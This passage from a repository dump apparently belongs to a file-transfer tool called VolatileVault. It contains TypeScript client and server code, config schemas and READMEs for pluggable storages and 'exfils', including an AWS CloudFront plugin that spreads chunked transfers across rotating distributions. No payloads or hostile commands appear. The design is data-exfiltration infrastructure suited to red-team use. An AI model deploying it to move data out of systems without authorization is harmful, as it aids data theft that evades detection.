awscloudfront?: ApiConfigItem; 32 | } 33 | 34 | export interface ApiConfigBaseExfil { 35 | max_total_size?: number; 36 | chunk_size?: number; 37 | } 38 | 39 | export interface 
ApiConfigBasicHTTPExfil extends ApiConfigBaseExfil { 40 | hosts: string[]; 41 | } 42 | 43 | export type AwsCloudFrontTransferMode = 'Dynamic' | 'Static'; 44 | 45 | export interface AwsCloudFrontTransferConfig { 46 | mode: AwsCloudFrontTransferMode; 47 | hosts?: string[]; 48 | } 49 | 50 | export interface ApiConfigAwsCloudFrontExfil extends ApiConfigBaseExfil { 51 | upload: AwsCloudFrontTransferConfig; 52 | download: AwsCloudFrontTransferConfig; 53 | } 54 | 55 | export interface ApiConfigStorageCollection { 56 | filesystem?: ApiConfigItem; 57 | awss3?: ApiConfigItem; 58 | } 59 | 60 | export interface ApiConfigBaseStorage { 61 | max_size: number; 62 | file_expiry: number; 63 | } 64 | 65 | export interface ApiConfigItem { 66 | name: string; 67 | displayName: string; 68 | info?: T; 69 | } 70 | 71 | export default class Api { 72 | public token?: string = undefined; 73 | public static BASE_URL: string = Config.BASE_URL; 74 | 75 | public static fail_from_error( 76 | error: any, 77 | defaultMessage: string = 'Failure' 78 | ): ApiResponse { 79 | return { 80 | success: false, 81 | message: error?.response?.data?.message ?? defaultMessage, 82 | }; 83 | } 84 | 85 | public static success_from_data(data: any): ApiResponse { 86 | return { ...data, success: true }; 87 | } 88 | 89 | public async isAuthenticated(): Promise { 90 | try { 91 | type Obj = { [key: string]: string }; 92 | var headers: Obj = {}; 93 | if (this.token) headers['Authorization'] = `Bearer ${this.token}`; 94 | 95 | const res = await axios.get(Api.BASE_URL + '/api/auth', { 96 | headers: headers, 97 | }); 98 | 99 | return Api.success_from_data(res.data) as ApiGetAuthResponse; 100 | } catch (error) { 101 | return Promise.reject( 102 | Api.fail_from_error(error, 'Unauthorized') 103 | ); 104 | } 105 | } 106 | 107 | public async authenticate(code: string): Promise { 108 | try { 109 | type Obj = { [key: string]: string }; 110 | var headers: Obj = {}; 111 | headers['content-type'] = 'application/json'; 112 | if (this.token) headers['Authorization'] = `Bearer ${this.token}`; 113 | 114 | const res = await axios.post( 115 | Api.BASE_URL + '/api/auth', 116 | { totp: code }, 117 | { headers: { 'content-type': 'application/json' } } 118 | ); 119 | 120 | if (!res.data?.token) 121 | return Promise.reject( 122 | Api.fail_from_error(undefined, 'Failed to receive JWT') 123 | ); 124 | 125 | this.token = res.data.token; 126 | return Api.success_from_data(res.data) as ApiGetAuthResponse; 127 | } catch (error) { 128 | return Promise.reject(Api.fail_from_error(error)); 129 | } 130 | } 131 | 132 | public async config(): Promise { 133 | try { 134 | const res = await axios.get(Api.BASE_URL + '/api/config', { 135 | headers: { 136 | Authorization: `Bearer ${this.token}`, 137 | }, 138 | responseType: 'json', 139 | }); 140 | 141 | return Api.success_from_data(res.data) as ApiConfigResponse; 142 | } catch (error) { 143 | return Promise.reject(Api.fail_from_error(error) as ApiConfigResponse); 144 | } 145 | } 146 | 147 | public saveToken() { 148 | if (!this.token) throw new Error("Can't save token; token unset!"); 149 | localStorage.setItem('token', this.token); 150 | } 151 | 152 | public getToken(): string | null { 153 | const token = localStorage.getItem('token'); 154 | if (token) 155 | this.token = token; 156 | return token; 157 | } 158 | 159 | public clearToken() { 160 | localStorage.removeItem("token"); 161 | this.token = undefined; 162 | } 163 | } 164 | -------------------------------------------------------------------------------- /client/src/utils/Config.ts: 
-------------------------------------------------------------------------------- 1 | export default { 2 | BASE_URL: process.env.REACT_APP_BASE_URL ?? window.location.origin, 3 | DEBUG : true//process.env.DEBUG !== undefined ?? false 4 | }; 5 | -------------------------------------------------------------------------------- /client/src/utils/Crypto.ts: -------------------------------------------------------------------------------- 1 | const makeKey = async (password: string): Promise => { 2 | const raw = new TextEncoder().encode(password); 3 | const key = new Uint8Array(32); 4 | if (raw.length < key.length) 5 | for (var i = 0; i < key.length; i++) key[i] = raw[i % raw.length]; // Pad key with repetitions of password 6 | 7 | return await crypto.subtle.importKey( 8 | 'raw', 9 | key, 10 | { 11 | name: 'AES-GCM', 12 | length: 256, 13 | }, 14 | true, 15 | ['encrypt', 'decrypt'] 16 | ); 17 | }; 18 | 19 | export const encryptSymmetric = async ( 20 | plaintext: ArrayBuffer, 21 | key: string 22 | ): Promise<[ArrayBuffer, ArrayBuffer]> => { 23 | const iv = crypto.getRandomValues(new Uint8Array(12)); 24 | const secretKey = await makeKey(key); 25 | 26 | const ciphertext = await crypto.subtle.encrypt( 27 | { 28 | name: 'AES-GCM', 29 | iv: iv, 30 | tagLength: 128, 31 | }, 32 | secretKey, 33 | plaintext 34 | ); 35 | 36 | return [ciphertext, iv.buffer]; 37 | }; 38 | 39 | export const decryptSymmetric = async ( 40 | ciphertext: ArrayBuffer, 41 | iv: ArrayBuffer, 42 | key: string 43 | ): Promise => { 44 | const secretKey = await makeKey(key); 45 | 46 | const cleartext = await crypto.subtle.decrypt( 47 | { 48 | name: 'AES-GCM', 49 | iv: iv, 50 | tagLength: 128, 51 | }, 52 | secretKey, 53 | ciphertext 54 | ); 55 | return cleartext; 56 | }; 57 | -------------------------------------------------------------------------------- /client/src/utils/Entropy.ts: -------------------------------------------------------------------------------- 1 | export const fromArrayBuffer = (data: ArrayBuffer) => 2 | fromBuffer(new Uint8Array(data)); 3 | 4 | export const fromBuffer = (data: Buffer | Uint8Array) => { 5 | const frequencies = data.reduceRight( 6 | (freq, c) => freq.set(c, freq.has(c) ? 
(freq.get(c) as number) + 1 : 1), 7 | new Map() 8 | ); 9 | return Array.from(frequencies.values()).reduce( 10 | (sum, f) => sum - (f / data.byteLength) * Math.log2(f / data.byteLength), 11 | 0 12 | ); 13 | }; 14 | -------------------------------------------------------------------------------- /client/src/utils/Files.ts: -------------------------------------------------------------------------------- 1 | import bytes from 'bytes'; 2 | 3 | export function calcSize(files: File[]): number { 4 | return files.reduce((n, file) => n + file.size, 0); 5 | } 6 | 7 | export function formatSize(size: number): string { 8 | return bytes.format(size, { decimalPlaces: 2 }); 9 | } 10 | -------------------------------------------------------------------------------- /client/src/utils/Snack.ts: -------------------------------------------------------------------------------- 1 | import { enqueueSnackbar } from 'notistack'; 2 | 3 | export function snackSuccess(message: string) { 4 | enqueueSnackbar({ variant: 'success', message: message }); 5 | } 6 | 7 | export function snackError(message: string) { 8 | enqueueSnackbar({ variant: 'error', message: message }); 9 | } 10 | 11 | export function snackInfo(message: string) { 12 | enqueueSnackbar({ variant: 'info', message: message }); 13 | } 14 | 15 | export function snackWarning(message: string) { 16 | enqueueSnackbar({ variant: 'warning', message: message }); 17 | } 18 | 19 | export function snack(message: string) { 20 | enqueueSnackbar({ variant: 'default', message: message }); 21 | } 22 | -------------------------------------------------------------------------------- /client/tsconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "compilerOptions": { 3 | "target": "es5", 4 | "lib": [ 5 | "dom", 6 | "dom.iterable", 7 | "esnext" 8 | ], 9 | "allowJs": true, 10 | "skipLibCheck": true, 11 | "esModuleInterop": true, 12 | "allowSyntheticDefaultImports": true, 13 | "strict": true, 14 | "forceConsistentCasingInFileNames": true, 15 | "noFallthroughCasesInSwitch": true, 16 | "module": "esnext", 17 | "moduleResolution": "node", 18 | "resolveJsonModule": true, 19 | "isolatedModules": true, 20 | "noEmit": true, 21 | "jsx": "react-jsx" 22 | }, 23 | "include": [ 24 | "src" 25 | ] 26 | } 27 | -------------------------------------------------------------------------------- /docker-compose.prod.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | services: 3 | web: 4 | build: . 
5 | ports: 6 | - "80:${BACKEND_PORT}" 7 | restart: always 8 | env_file: .env 9 | -------------------------------------------------------------------------------- /make_test_files.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | dd if=/dev/urandom of=test1m.bin count=1 bs=1M status=progress 4 | dd if=/dev/urandom of=test10m.bin count=10 bs=1M status=progress 5 | dd if=/dev/urandom of=test100m.bin count=100 bs=1M status=progress 6 | -------------------------------------------------------------------------------- /screenshots/screenshot1-select.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/molatho/VolatileVault/85353c5310749299387598ff77f7d81daf8bd248/screenshots/screenshot1-select.png -------------------------------------------------------------------------------- /screenshots/screenshot2-upload.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/molatho/VolatileVault/85353c5310749299387598ff77f7d81daf8bd248/screenshots/screenshot2-upload.png -------------------------------------------------------------------------------- /screenshots/screenshot3-download.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/molatho/VolatileVault/85353c5310749299387598ff77f7d81daf8bd248/screenshots/screenshot3-download.png -------------------------------------------------------------------------------- /server/.gitignore: -------------------------------------------------------------------------------- 1 | # dependencies 2 | /node_modules 3 | 4 | npm-debug.log* 5 | /files* 6 | 7 | config.yaml 8 | 9 | /logs/*.log* 10 | 11 | *.pem -------------------------------------------------------------------------------- /server/README.md: -------------------------------------------------------------------------------- 1 |
2 | 3 |

Volatile Vault - Server

4 |
5 |
6 | 7 | To little surprise, the server is the central and arguably most important component of Volatile Vault. While it does its best not to do anything stupid, it requires you to configure it properly. 8 | 9 | # Concept 10 | 11 | Volatile Vault allows you to mix and match plugins for file storages ("storages") and exfiltration mechanisms ("exfils") to your heart's content. Storages are plugins that store and retrieve files - this could be the server's filesystem or a cloud storage such as AWS S3. Exfils are data transports that allow you to upload and download files to and from Volatile Vault - this could be a simple built-in HTTP transport or an entirely different protocol such as QUIC. 12 | 13 | You can specify which storages and exfils to use by configuring them in (or omitting them from) your server's configuration. 14 | 15 | # Configuration 16 | 17 | Volatile Vault uses YAML files for configuration. The server expects to find a `config.yaml` file in its root directory and will refuse to start up if it's missing or invalid. You can find a template [here](config.example.yaml). 18 | 19 | The config consists of three major parts: 20 | 21 | * **general**: The general configuration of the server, including the port its API is reachable on. 22 | * **storage**: Configurations for individual storages. 23 | * **exfil**: Configurations for individual exfils. 24 | 25 | Please refer to the individual plugins' README files for more details on their exact configuration: 26 | * Storages 27 | * [filesystem](src/extensions/storage/FileSystem/README.md) 28 | * [awss3](src/extensions/storage/AwsS3/README.md) 29 | * Exfils 30 | * [basichttp](src/extensions/exfil/BasicHttp/README.md) 31 | * [awscloudfront](src/extensions/exfil/AwsCloudFront/README.md) 32 | 33 | At this time there can only be a single instance of each plugin active and configured at a time. This means that you can for example configure both basichttp and awscloudfront exfils, but you cannot configure two instances of basichttp. 
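
For orientation, a minimal `config.yaml` following the three-part structure above might look roughly like this. The values are placeholders taken from the bundled [config.example.yaml](config.example.yaml); the plugin READMEs remain the authoritative reference for each field:

```yaml
---
general:
  port: 8888
  totp_secret: '' # fill in your TOTP secret
  jwt_expiry: 60
storage:
  filesystem:
    folder: './files_basic'
    max_size: 104857600
    file_expiry: 60
exfil:
  basichttp:
    max_total_size: 104857600
    hosts:
      - 'https://my.cool.site'
```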
-------------------------------------------------------------------------------- /server/config.example.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | general: 3 | port: 8888 4 | totp_secret: '' 5 | jwt_expiry: 60 6 | storage: 7 | filesystem: 8 | folder: './files_basic' 9 | max_size: 104857600 10 | file_expiry: 60 11 | exfil: 12 | basichttp: 13 | max_total_size: 104857600 14 | hosts: 15 | - 'https://my.cool.site' 16 | awscloudfront: 17 | access_key_id: '' 18 | secret_access_key: '' 19 | region: '' 20 | distribution_tag: 'volatilevault' 21 | domain: my.cool.site 22 | folder: './files_aws' 23 | chunk_size: 1000000 24 | max_total_size: 10000000 25 | upload: 26 | mode: 'Static' 27 | max_duration: 5 28 | hosts: 29 | - '.cloudfront.net' 30 | - '.cloudfront.net' 31 | - '.cloudfront.net' 32 | - '.cloudfront.net' 33 | - '.cloudfront.net' 34 | - '.cloudfront.net' 35 | - '.cloudfront.net' 36 | - '.cloudfront.net' 37 | - '.cloudfront.net' 38 | - '.cloudfront.net' 39 | download: 40 | mode: 'Dynamic' 41 | max_duration: 15 42 | max_dynamic_hosts: 10 43 | -------------------------------------------------------------------------------- /server/logs/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/molatho/VolatileVault/85353c5310749299387598ff77f7d81daf8bd248/server/logs/.gitkeep -------------------------------------------------------------------------------- /server/nodemon.json: -------------------------------------------------------------------------------- 1 | { 2 | "ignore": [ 3 | ".git", 4 | "node_modules", 5 | "dist" 6 | ], 7 | "watch": [ 8 | "./src" 9 | ], 10 | "exec": "npm start", 11 | "ext": "ts" 12 | } -------------------------------------------------------------------------------- /server/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "node-react-docker-compose", 3 | "version": "1.0.0", 4 | "description": "A reference for running a node server and create-react-app app via docker-compose.", 5 | "main": "src/index.js", 6 | "scripts": { 7 | "start": "ts-node ./src/server.ts", 8 | "start:prod": "npm run build && node ./dist/src/server.js", 9 | "start:nodemon": "npx nodemon ./src/server.ts", 10 | "build": "npx tsc" 11 | }, 12 | "author": "Peter Coles", 13 | "license": "MIT", 14 | "dependencies": { 15 | "@aws-sdk/client-cloudfront": "^3.606.0", 16 | "@aws-sdk/client-s3": "^3.608.0", 17 | "@aws-sdk/lib-storage": "^3.614.0", 18 | "@aws-sdk/s3-request-presigner": "^3.608.0", 19 | "@types/multistream": "^4.1.3", 20 | "@types/node-cron": "^3.0.11", 21 | "ajv": "^8.12.0", 22 | "body-parser": "^1.20.2", 23 | "cors": "^2.8.5", 24 | "dotenv": "^16.4.1", 25 | "express": "^4.17.1", 26 | "express-jwt": "^8.4.1", 27 | "moment": "^2.30.1", 28 | "multistream": "^4.1.0", 29 | "nocache": "^4.0.0", 30 | "node-cron": "^3.0.3", 31 | "otpauth": "^9.2.2", 32 | "short-unique-id": "^5.0.3", 33 | "ts-json-schema-generator": "^2.0.1", 34 | "winston": "^3.13.0", 35 | "yaml": "^2.4.1" 36 | }, 37 | "devDependencies": { 38 | "@types/express": "^4.17.21", 39 | "@types/node": "^20.11.16", 40 | "nodemon": "^3.0.3", 41 | "ts-node": "^10.9.2", 42 | "typescript": "^5.3.3" 43 | } 44 | } 45 | -------------------------------------------------------------------------------- /server/src/config/config.ts: -------------------------------------------------------------------------------- 1 | export interface Config { 2 | general: General; 3 | storage: 
Storage; 4 | exfil: Exfil; 5 | } 6 | 7 | export interface General { 8 | port: number; 9 | totp_secret: string; 10 | jwt_expiry: number; 11 | } 12 | 13 | export interface Storage { 14 | filesystem?: StorageFileSystem; 15 | awss3?: StorageAwsS3; 16 | } 17 | 18 | export interface BaseStorage { 19 | file_expiry: number; 20 | max_size: number; 21 | } 22 | 23 | export interface StorageFileSystem extends BaseStorage { 24 | folder: string; 25 | } 26 | 27 | export interface Exfil { 28 | basichttp?: ExfilBasicHTTP; 29 | awscloudfront?: ExfilAwsCloudFront; 30 | } 31 | 32 | export interface BaseExfil { 33 | max_total_size?: number; 34 | chunk_size?: number; 35 | } 36 | 37 | export interface ExfilBasicHTTP extends BaseExfil { 38 | hosts: string[]; 39 | } 40 | 41 | export interface BaseAwsSettings { 42 | access_key_id: string; 43 | secret_access_key: string; 44 | region: string; 45 | } 46 | 47 | export type TransferMode = 'Dynamic' | 'Static'; 48 | 49 | export interface TransferConfig { 50 | mode: TransferMode; 51 | hosts?: string[]; 52 | max_dynamic_hosts?: number; 53 | max_duration: number; 54 | } 55 | 56 | export interface ExfilAwsCloudFront extends BaseExfil, BaseAwsSettings { 57 | distribution_tag: string; 58 | domain: string; 59 | folder: string; 60 | upload: TransferConfig; 61 | download: TransferConfig; 62 | } 63 | 64 | export interface StorageAwsS3 extends BaseStorage, BaseAwsSettings { 65 | bucket: string; 66 | generate_presigned_urls: boolean; 67 | user_arn: string; 68 | } 69 | -------------------------------------------------------------------------------- /server/src/config/instance.ts: -------------------------------------------------------------------------------- 1 | import { Config } from './config'; 2 | import { load } from './util'; 3 | 4 | export class ConfigInstance { 5 | private static config: Config | null = null; 6 | 7 | public static get Inst() { 8 | if (ConfigInstance.config === null) { 9 | throw new Error('ConfigInstance uninitialized'); 10 | } 11 | return ConfigInstance.config; 12 | } 13 | 14 | public static async init(): Promise { 15 | ConfigInstance.config = await load(); 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /server/src/config/util.ts: -------------------------------------------------------------------------------- 1 | import { createGenerator } from "ts-json-schema-generator"; 2 | import { Config } from "./config"; 3 | import path from 'path'; 4 | import Ajv from 'ajv'; 5 | import fs, { constants } from 'fs/promises'; 6 | import { parse } from 'yaml' 7 | 8 | 9 | export const load = async () : Promise => { 10 | const root = process.cwd(); 11 | 12 | // Read YAML 13 | const cfgPath = path.join(root, "config.yaml"); 14 | try { 15 | await fs.access(cfgPath, constants.R_OK | constants.W_OK); 16 | } catch (error) { 17 | throw new Error(`Failed to access config at ${cfgPath}`) 18 | } 19 | 20 | const cfgYaml = await fs.readFile(cfgPath, {encoding: "utf8"}) 21 | // Parse YAML 22 | const cfg = parse(cfgYaml) 23 | 24 | // Generate schema from source 25 | const schema = createGenerator({ 26 | path: path.join(root, "src", "config", "config.ts"), 27 | tsconfig: path.join(root, "tsconfig.json"), 28 | type: "Config" 29 | }).createSchema("Config"); 30 | 31 | // Validate YAML against schema 32 | const validate = new Ajv().compile(schema); 33 | if (!validate(cfg)) { 34 | const msg = validate.errors[0].message ?? 
"YAML error"; 35 | const path = validate.errors[0].instancePath; 36 | throw new Error(`${path}: ${msg}`) 37 | } 38 | return cfg as Config 39 | } -------------------------------------------------------------------------------- /server/src/extensions/exfil/AwsCloudFront/README.md: -------------------------------------------------------------------------------- 1 |
2 | 3 |

Volatile Vault - AwsCloudFront Exfil

4 |
5 |
6 | 7 | This exfil allows Volatile Vault to use AWS CloudFront distributions for proxying chunks of data transfers. 8 | 9 | # Configuration 10 | 11 | Example: 12 | 13 | ```yaml 14 | --- 15 | exfil: 16 | awscloudfront: 17 | access_key_id: '' 18 | secret_access_key: '' 19 | region: '' 20 | distribution_tag: 'volatilevault' 21 | domain: my.cool.site 22 | folder: './files_aws' 23 | chunk_size: 1000000 24 | max_total_size: 10000000 25 | upload: 26 | mode: 'Static' 27 | max_duration: 5 28 | hosts: 29 | - '.cloudfront.net' 30 | - '.cloudfront.net' 31 | - '.cloudfront.net' 32 | - '.cloudfront.net' 33 | - '.cloudfront.net' 34 | - '.cloudfront.net' 35 | - '.cloudfront.net' 36 | - '.cloudfront.net' 37 | - '.cloudfront.net' 38 | - '.cloudfront.net' 39 | download: 40 | mode: 'Dynamic' 41 | max_duration: 15 42 | max_dynamic_hosts: 10 43 | ``` 44 | 45 | Fields: 46 | 47 | - `access_key_id`: AWS IAM access key to use for authentication. 48 | - `secret_access_key`: AWS IAM secret access key to use for authentication. 49 | - `region`: AWS region to use when registering new distributions. 50 | - `distribution_tag`: Tag to apply to distributions so they can be associated with this VV instance. 51 | - `domain`: Target domain to proxy traffic to - your VV server should run here. 52 | - `folder`: Absolute or relative path to a folder to temporarily store chunks for uploads/downloads in. 53 | - `chunk_size`: Maximum amount of bytes transferred per chunk. Used to calculate the number of distributions to register (in `Dynamic` mode). Example: `chunk_size: 10` will result in `5` distributions being spawned when uploading a file of `45` bytes. 54 | - `max_total_size`: Maximum allowed size of a single data transfer (upload or download). 55 | - `upload`/`download`: Configuration for file uploads and downloads, respectively: 56 | - `mode`: Either `Dynamic` or `Static` 57 | - `Dynamic`: AWS CloudFront distributions are registered and deployed dynamically. While this supplies you with fresh distributions for each file transfer, it can take some time for them to deploy. Requires you to specify `max_duration`. 58 | - `Static`: Predefined AWS CloudFront distributions are used for proxying data transfers. In this mode you will re-use the predefined distributions but they're instantly available. Requires you to specify `hosts`. 59 | - `max_duration`: Maximum duration (in minutes) that initialized transfers may take to complete before their temporary files are removed. 60 | - `max_dynamic_hosts`: Maximum number of distributions to register for a single transfer. Set to `0` to ignore this parameter and register distributions solely based on the size of the data being transferred (see `chunk_size`). 61 | - `hosts`: List of pre-registered and deployed AWS CloudFront distributions to use in `Static` mode. 
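
As a quick illustration of how `chunk_size` and `max_dynamic_hosts` interact in `Dynamic` mode (following the `chunk_size: 10` / `45` bytes example above), the number of distributions registered for a transfer can be sketched as follows. The helper below is illustrative only and not part of the codebase:

```typescript
// Illustrative sketch (not part of the codebase): number of CloudFront
// distributions needed for a transfer of `totalSize` bytes in 'Dynamic' mode.
function requiredDistributions(
  totalSize: number,
  chunkSize: number,
  maxDynamicHosts = 0
): number {
  const byChunks = Math.ceil(totalSize / chunkSize); // e.g. ceil(45 / 10) = 5
  // max_dynamic_hosts of 0 means "no cap"; otherwise it limits the count.
  return maxDynamicHosts > 0 ? Math.min(byChunks, maxDynamicHosts) : byChunks;
}
```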
62 | -------------------------------------------------------------------------------- /server/src/extensions/exfil/AwsCloudFront/awscloudfront.ts: -------------------------------------------------------------------------------- 1 | import bodyParser from 'body-parser'; 2 | import express, { Express, Request, Response } from 'express'; 3 | import { Readable } from 'node:stream'; 4 | import path from 'path'; 5 | import ShortUniqueId from 'short-unique-id'; 6 | import winston from 'winston'; 7 | import { 8 | Config, 9 | ExfilAwsCloudFront, 10 | TransferConfig, 11 | } from '../../../config/config'; 12 | import { FsUtils } from '../../../fs'; 13 | import { Logger } from '../../../logging'; 14 | import { readFixedChunks } from '../../../streams'; 15 | import { 16 | BaseExtension, 17 | ExtensionInfo, 18 | FileUploadInformation, 19 | } from '../../extension'; 20 | import { ExtensionRepository } from '../../repository'; 21 | import { CloudFrontWrapper } from './wrapper'; 22 | import { 23 | BinaryData, 24 | ExfilProvider, 25 | ExfilProviderCapabilities, 26 | FileInformation, 27 | } from '../provider'; 28 | import cron from 'node-cron'; 29 | import MultiStream from 'multistream'; 30 | import moment from 'moment'; 31 | 32 | interface ChunkData { 33 | chunkId: number; 34 | fileId: string | null; 35 | done: boolean; 36 | } 37 | interface TransferData { 38 | id: string; 39 | total_size: number; 40 | storage: string; 41 | hosts: string[]; 42 | creation: Date; 43 | fs: FsUtils; 44 | } 45 | 46 | interface DownloadTransferData extends TransferData { 47 | chunks: ChunkData[]; 48 | } 49 | 50 | interface UploadTransferData extends TransferData { 51 | chunks: ChunkData[]; 52 | } 53 | 54 | const TRANSFER_IDS = new ShortUniqueId({ 55 | length: 16, 56 | dictionary: 'alpha_upper', 57 | }); 58 | 59 | export class AwsCloudFrontExfilProvider 60 | extends BaseExtension 61 | implements ExfilProvider 62 | { 63 | private static NAME: string = 'awscloudfront'; 64 | private logger: winston.Logger; 65 | private client: CloudFrontWrapper; 66 | private uploads: UploadTransferData[]; 67 | private downloads: DownloadTransferData[]; 68 | private fs: FsUtils; 69 | private staticDownloadIdx: number; 70 | private staticUploadIdx: number; 71 | 72 | public get max_total_size(): number { 73 | return this.config.max_total_size ?? 100 * 1024 * 1024; // Default to 100MB 74 | } 75 | 76 | public get chunk_size(): number { 77 | return this.config.chunk_size ?? 
10 * 1024 * 1024; // Default to 10MB 78 | } 79 | 80 | public constructor() { 81 | super(AwsCloudFrontExfilProvider.NAME, [ 82 | 'DownloadChunked', 83 | 'UploadChunked', 84 | ]); 85 | this.logger = Logger.Instance.createChildLogger('AwsCloudFront'); 86 | this.uploads = []; 87 | this.downloads = []; 88 | this.fs = new FsUtils(AwsCloudFrontExfilProvider.NAME); 89 | this.staticDownloadIdx = 0; 90 | this.staticUploadIdx = 0; 91 | } 92 | 93 | get config(): ExfilAwsCloudFront { 94 | return this.cfg.exfil.awscloudfront; 95 | } 96 | 97 | get clientConfig(): ExtensionInfo { 98 | return { 99 | name: AwsCloudFrontExfilProvider.NAME, 100 | displayName: 'AWS CloudFront', 101 | info: { 102 | max_total_size: this.config.max_total_size, 103 | chunk_size: this.config.chunk_size, 104 | upload: { 105 | mode: this.config.upload.mode, 106 | hosts: this.config.upload.hosts, 107 | }, 108 | download: { 109 | mode: this.config.download.mode, 110 | hosts: this.config.download.hosts, 111 | }, 112 | }, 113 | }; 114 | } 115 | 116 | public override async installCron(): Promise { 117 | cron.schedule('0 * * * * *', () => { 118 | for (const download of this.downloads) 119 | download.fs.cleanup(1000 * 60 * this.config.download.max_duration); 120 | 121 | for (const upload of this.uploads) 122 | upload.fs.cleanup(1000 * 60 * this.config.upload.max_duration); 123 | 124 | const now = moment(); 125 | const expired = ( 126 | transfer: TransferData, 127 | minutes: number, 128 | removeHosts: boolean 129 | ): boolean => { 130 | const _expired = 131 | moment.duration(now.diff(moment(transfer.creation))).asMinutes() >= 132 | minutes; 133 | 134 | if (_expired) { 135 | this.logger.info(`Removing expired transfer ${transfer.id}`); 136 | if (removeHosts) this.client.releaseDistributions(transfer.id); 137 | } 138 | return _expired; 139 | }; 140 | 141 | this.downloads = this.downloads.filter( 142 | (download) => 143 | !expired( 144 | download, 145 | this.config.download.max_duration, 146 | this.config.download.mode == 'Dynamic' 147 | ) 148 | ); 149 | this.uploads = this.uploads.filter( 150 | (upload) => 151 | !expired( 152 | upload, 153 | this.config.upload.max_duration, 154 | this.config.upload.mode == 'Dynamic' 155 | ) 156 | ); 157 | }); 158 | return Promise.resolve(); 159 | } 160 | 161 | private validateTransferConfig( 162 | config: TransferConfig, 163 | transfer: 'Download' | 'Upload' 164 | ): boolean { 165 | if (config.mode == 'Dynamic' && config.max_dynamic_hosts === undefined) { 166 | this.logger.error( 167 | `${transfer} configured as dynamic but no max dynamic hosts set` 168 | ); 169 | return false; 170 | } 171 | if ( 172 | config.mode == 'Static' && 173 | (config.hosts === undefined || !config.hosts?.length) 174 | ) { 175 | this.logger.error( 176 | `${transfer} configured as static but no hosts defined` 177 | ); 178 | return false; 179 | } 180 | return true; 181 | } 182 | 183 | async init(cfg: Config): Promise { 184 | this.cfg = cfg; 185 | if (this.config) { 186 | await this.fs.init(this.config.folder); 187 | 188 | this.logger.debug('Validating configuration...'); 189 | if ( 190 | !this.validateTransferConfig(this.config.download, 'Download') || 191 | !this.validateTransferConfig(this.config.upload, 'Upload') 192 | ) { 193 | this.state = 'InitializationError'; 194 | return; 195 | } 196 | 197 | this.logger.debug('Initializing CloudFront client...'); 198 | this.client = new CloudFrontWrapper( 199 | this.config.access_key_id, 200 | this.config.secret_access_key, 201 | this.config.region, 202 | this.config.distribution_tag, 203 | 
this.config.domain 204 | ); 205 | 206 | this.logger.debug('Validating credentials...'); 207 | 208 | if ((await this.client.validateCredentials()) == false) { 209 | this.state = 'InitializationError'; 210 | return; 211 | } 212 | 213 | this.logger.info('Initialized & validated credentials'); 214 | await this.client.getCachePolicyId(); 215 | this.register(); 216 | this.state = 'Initialized'; 217 | } else { 218 | this.logger.debug('Config not set'); 219 | this.state = 'Unconfigured'; 220 | } 221 | } 222 | 223 | protected register() { 224 | ExtensionRepository.getInstance().registerExfil(this); 225 | } 226 | 227 | get hosts(): Promise { 228 | const staticUploads = this.config.upload.hosts ?? []; 229 | const staticDownloads = this.config.download.hosts ?? []; 230 | const assignedUploads = this.uploads.map((u) => u.hosts).flat(); 231 | const assignedDownloads = this.downloads.map((u) => u.hosts).flat(); 232 | return Promise.resolve( 233 | staticUploads 234 | .concat(staticDownloads) 235 | .concat(assignedUploads) 236 | .concat(assignedDownloads) 237 | ); 238 | } 239 | 240 | async installRoutes(app: Express): Promise { 241 | // Kick-off a chunked upload: allocate domains 242 | const initChunkUpload = express.Router(); 243 | initChunkUpload.post( 244 | `/api/${AwsCloudFrontExfilProvider.NAME}/initupload/:storage/:size`, 245 | async (req: Request, res: Response) => { 246 | this.logger.info( 247 | `InitChunkUpload request to ${req.params?.storage ?? 'n/a'} for ${ 248 | req.params?.size ?? 'n/a' 249 | } bytes from ${req.ip}` 250 | ); 251 | 252 | try { 253 | // Validate storage param 254 | const storageName = req.params?.storage; 255 | if (!storageName) throw new Error('Missing storage'); 256 | 257 | const size = parseInt(req.params?.size); 258 | if (Number.isNaN(size) || size <= 0) throw new Error('Invalid size'); 259 | if (size > this.max_total_size) 260 | throw new Error('Maximum file size exceeded'); 261 | 262 | // Validate that storage exists 263 | const storage = 264 | ExtensionRepository.getInstance().getStorage(storageName); 265 | const transferId = await this.initChunkUpload(storageName, size); 266 | const transferData = this.uploads.find((t) => t.id === transferId); 267 | 268 | return res.json({ 269 | message: 'Initialization successful', 270 | hosts: transferData.hosts, 271 | chunks: transferData.chunks.length, 272 | size: size, 273 | id: transferData.id, 274 | }); 275 | } catch (error) { 276 | this.logger.error( 277 | `Error: ${error?.message ?? JSON.stringify(error)}` 278 | ); 279 | return res.status(400).json({ message: error?.message ?? 'Failure' }); 280 | } 281 | } 282 | ); 283 | app.use(initChunkUpload); 284 | 285 | // Get deployment status of domains used for specific transfer 286 | const transferStatus = express.Router(); 287 | transferStatus.get( 288 | `/api/${AwsCloudFrontExfilProvider.NAME}/status/:transferId`, 289 | async (req: Request, res: Response) => { 290 | this.logger.info( 291 | `Transfer status request for ${ 292 | req.params?.transferId ?? 
'n/a' 293 | } from ${req.ip}` 294 | ); 295 | 296 | try { 297 | // Validate param 298 | const transferId = req.params?.transferId; 299 | if (!transferId) throw new Error(`Invalid transfer ${transferId}`); 300 | const upload = this.uploads.find((t) => t.id === transferId); 301 | const download = this.downloads.find((t) => t.id === transferId); 302 | if (!upload && !download) 303 | throw new Error(`Unknown transfer ${transferId}`); 304 | 305 | const status = 306 | (upload && this.config.upload.mode == 'Static') || 307 | (download && this.config.download.mode == 'Static') 308 | ? true 309 | : await this.client.areDistributionsReady(transferId); 310 | 311 | return res.json({ message: 'Request successful', status }); 312 | } catch (error) { 313 | this.logger.error( 314 | `Error: ${error?.message ?? JSON.stringify(error)}` 315 | ); 316 | return res.status(400).json({ message: error?.message ?? 'Failure' }); 317 | } 318 | } 319 | ); 320 | app.use(transferStatus); 321 | 322 | // Upload a single chunk 323 | const chunkedUpload = express.Router(); 324 | chunkedUpload.use( 325 | bodyParser.raw({ 326 | limit: this.chunk_size, 327 | type: 'application/octet-stream', 328 